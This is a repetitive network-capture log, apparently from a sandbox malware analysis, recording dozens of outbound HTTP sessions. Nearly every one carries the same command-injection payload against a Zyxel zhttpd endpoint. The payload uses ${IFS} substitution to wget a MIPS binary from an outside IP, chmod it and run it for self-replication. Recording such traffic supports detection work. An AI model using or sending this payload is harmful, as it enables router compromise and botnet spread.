                                                Jan 12, 2024 18:24:27.641345978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2345192.168.2.133501486.237.163.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641402006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2346192.168.2.1339394223.31.203.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641458988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2347192.168.2.135495242.134.243.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641520023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2348192.168.2.1344726134.143.45.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641572952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2349192.168.2.134784085.72.143.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641624928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2350192.168.2.134446494.193.247.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641665936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2351192.168.2.1347888146.189.132.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641729116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2352192.168.2.135785664.232.242.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641769886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2353192.168.2.1334540113.178.86.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641817093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2354192.168.2.134300845.46.111.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641884089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2355192.168.2.1341332171.93.40.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.641947031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2356192.168.2.1334906216.215.208.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642011881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2357192.168.2.135600020.205.83.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642045975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2358192.168.2.134097499.2.63.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642085075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2359192.168.2.134091469.238.109.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642164946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2360192.168.2.1341040138.118.188.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642219067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2361192.168.2.1340834209.199.18.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642288923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2362192.168.2.133362077.180.234.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642349005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2363192.168.2.1358022203.29.160.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642404079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2364192.168.2.1340584204.0.84.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642472029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2365192.168.2.135139486.98.80.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642532110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2366192.168.2.135190012.209.114.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642584085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2367192.168.2.135348434.169.92.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642626047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2368192.168.2.1358868208.220.117.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642682076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2369192.168.2.1333068223.74.204.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642746925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2370192.168.2.1350834156.25.240.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642802000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2371192.168.2.133771065.216.231.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642865896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2372192.168.2.1334524112.163.172.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642924070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2373192.168.2.135489860.0.5.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.642996073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2374192.168.2.1360328107.231.68.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643053055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2375192.168.2.133412637.112.47.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643112898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2376192.168.2.1336870174.151.36.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643165112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2377192.168.2.1341830179.66.249.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643229008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2378192.168.2.1350684173.131.63.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643285990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2379192.168.2.1356336217.65.163.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643342972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2380192.168.2.134475487.148.64.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643384933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2381192.168.2.1344218174.148.241.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643449068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2382192.168.2.1339156221.189.132.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643522978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2383192.168.2.134389013.64.100.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643553019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2384192.168.2.134251045.137.71.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643623114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2385192.168.2.1336936142.92.191.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643673897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2386192.168.2.1346520166.241.74.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643752098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2387192.168.2.135378650.35.245.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643804073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2388192.168.2.135076612.116.47.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643841982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2389192.168.2.135404063.55.153.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643877029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2390192.168.2.1357432138.94.209.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643929005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2391192.168.2.133535444.53.232.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.643973112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2392192.168.2.134105467.107.25.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644025087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2393192.168.2.1343394164.61.88.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644066095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2394192.168.2.135339064.33.121.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644133091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2395192.168.2.134354050.110.72.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644196987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2396192.168.2.13459301.40.64.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644222021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2397192.168.2.1360662206.54.127.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644268990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2398192.168.2.133557239.111.144.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644298077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2399192.168.2.1336044124.87.29.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644367933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2400192.168.2.135776244.226.109.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644432068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2401192.168.2.1344908136.120.52.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644498110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2402192.168.2.1359874144.144.192.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644545078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2403192.168.2.1335552130.108.163.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644578934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2404192.168.2.1334324161.106.96.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644615889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2405192.168.2.133669848.129.38.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644663095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2406192.168.2.1336792170.206.161.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:27.644741058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2407192.168.2.1359650167.70.208.241443
                                                TimestampBytes transferredDirectionData
